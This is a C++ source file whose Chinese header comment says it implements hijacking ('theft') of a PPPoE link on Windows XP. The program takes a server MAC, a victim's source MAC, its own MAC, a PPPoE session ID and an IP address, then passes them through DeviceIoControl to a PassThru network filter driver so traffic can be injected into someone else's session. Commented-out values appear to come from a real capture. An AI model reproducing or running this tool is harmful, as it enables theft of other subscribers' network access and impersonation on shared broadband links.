test.cpp

在windows XP下实现对PPPoE链路的盗用。 因为本人网卡是旧网卡

#include <stdio.h>
#include <windows.h>
#include <WinIoCtl.h>
#include "../../ctrlcode.h"

HANDLE PtOpenControlChannel( void );

bool GetArgs(char ** argv, pPPPoELinkInfo p);

int main(int argc, char ** argv)
{
	HANDLE handle = INVALID_HANDLE_VALUE;
	ULONG byteReturned = 0;
	BOOL ret = FALSE;
	PPPoELinkInfo pli = {0};
	//// 00 E0 FC 02 D1 8E 
	//unsigned char ServerMac[] = {0x00, 0xE0, 0xFC, 0x02, 0xD1, 0x8E};
	//// 00 13 D3 EE A5 85
	//unsigned char SourceMac[] = {0x00, 0x13, 0xD3, 0xEE, 0xA5, 0x85};

	if (argc != 6 || !GetArgs(argv, &pli))
	{
		printf("\nArgs error.\n");
		getchar();
		return -1;
	}

	handle = PtOpenControlChannel();
	if (handle == INVALID_HANDLE_VALUE)
	{
		printf("\nCan't open the device.\n");
		getchar();
		return -1;
	}

	//pli.pktcnt = 0;
	//memcpy(pli.SerMac, ServerMac, 6);
	//memcpy(pli.SrcMac, SourceMac, 6);
	//pli.SrcIP = 0x16ED4BDA; // DA 4B ED 16
	//pli.Session = 0x04e4;

	ret = DeviceIoControl(handle, IOCTL_MY_SET_PPPOE_INFO,
		&pli, sizeof(PPPoELinkInfo), NULL, 0,
		&byteReturned, NULL);
	if (ret == TRUE)
	{
		printf("\nDeviceIoControl successful.\n");
	}
	else
	{
		printf("\nDeviceIoControl failed.\n");
	}
	getchar();

	return 0;
}


bool GetArgs(char ** argv, pPPPoELinkInfo p)
{
	ULONG ip[4];
	ULONG mac[6];
	if (6 != sscanf(argv[1], "%02X-%02X-%02X-%02X-%02X-%02X",
		&mac[0], &mac[1], &mac[2], &mac[3], &mac[4], &mac[5]))
	{
		return false;
	}
	p->SerMac[0] = mac[0]&0xff;
	p->SerMac[1] = mac[1]&0xff;
	p->SerMac[2] = mac[2]&0xff;
	p->SerMac[3] = mac[3]&0xff;
	p->SerMac[4] = mac[4]&0xff;
	p->SerMac[5] = mac[5]&0xff;

	if (6 != sscanf(argv[2], "%02X-%02X-%02X-%02X-%02X-%02X",
		&mac[0], &mac[1], &mac[2], &mac[3], &mac[4], &mac[5]))
	{
		return false;
	}
	p->SrcMac[0] = mac[0]&0xff;
	p->SrcMac[1] = mac[1]&0xff;
	p->SrcMac[2] = mac[2]&0xff;
	p->SrcMac[3] = mac[3]&0xff;
	p->SrcMac[4] = mac[4]&0xff;
	p->SrcMac[5] = mac[5]&0xff;

	if (6 != sscanf(argv[3], "%02X-%02X-%02X-%02X-%02X-%02X",
		&mac[0], &mac[1], &mac[2], &mac[3], &mac[4], &mac[5]))
	{
		return false;
	}
	p->SelfMac[0] = mac[0]&0xff;
	p->SelfMac[1] = mac[1]&0xff;
	p->SelfMac[2] = mac[2]&0xff;
	p->SelfMac[3] = mac[3]&0xff;
	p->SelfMac[4] = mac[4]&0xff;
	p->SelfMac[5] = mac[5]&0xff;

	if (1 != sscanf(argv[4], "%04X", &p->Session))
	{
		return false;
	}
	if (4 != sscanf(argv[5], "%d.%d.%d.%d", 
		&ip[0], &ip[1], &ip[2], &ip[3]))
	{
		return false;
	}
	p->SrcIP = ip[0]|(ip[1]<<8)|(ip[2]<<16)|(ip[3]<<24);
	p->pktcnt = 0;
	return true;
}

HANDLE
PtOpenControlChannel( void )
{
	DWORD	DesiredAccess;
	DWORD	ShareMode;
	LPSECURITY_ATTRIBUTES	lpSecurityAttributes = NULL;

	DWORD	CreationDistribution;
	DWORD	FlagsAndAttributes;
	HANDLE	TemplateFile;
	HANDLE	Handle;

	//
	// Use CreateFile to Open the Handle
	//
	DesiredAccess = GENERIC_READ|GENERIC_WRITE;
	ShareMode = 0;
	CreationDistribution = OPEN_EXISTING;
	FlagsAndAttributes = FILE_ATTRIBUTE_NORMAL;
	TemplateFile = (HANDLE)INVALID_HANDLE_VALUE;

	Handle = CreateFile(
		"\\\\.\\PassThru",
		DesiredAccess,
		ShareMode,
		lpSecurityAttributes,
		CreationDistribution,
		FlagsAndAttributes,
		TemplateFile
		);

	if( Handle == INVALID_HANDLE_VALUE )
	{
		//
		// Special Handling For Accessing Device On Windows 2000 Terminal Server
		// ---------------------------------------------------------------------
		// See Microsoft KB Article 259131
		//
		Handle = CreateFile(
			"\\\\.\\Globals\\PassThru",
			DesiredAccess,
			ShareMode,
			lpSecurityAttributes,
			CreationDistribution,
			FlagsAndAttributes,
			TemplateFile
			);
	}

	return (Handle);
}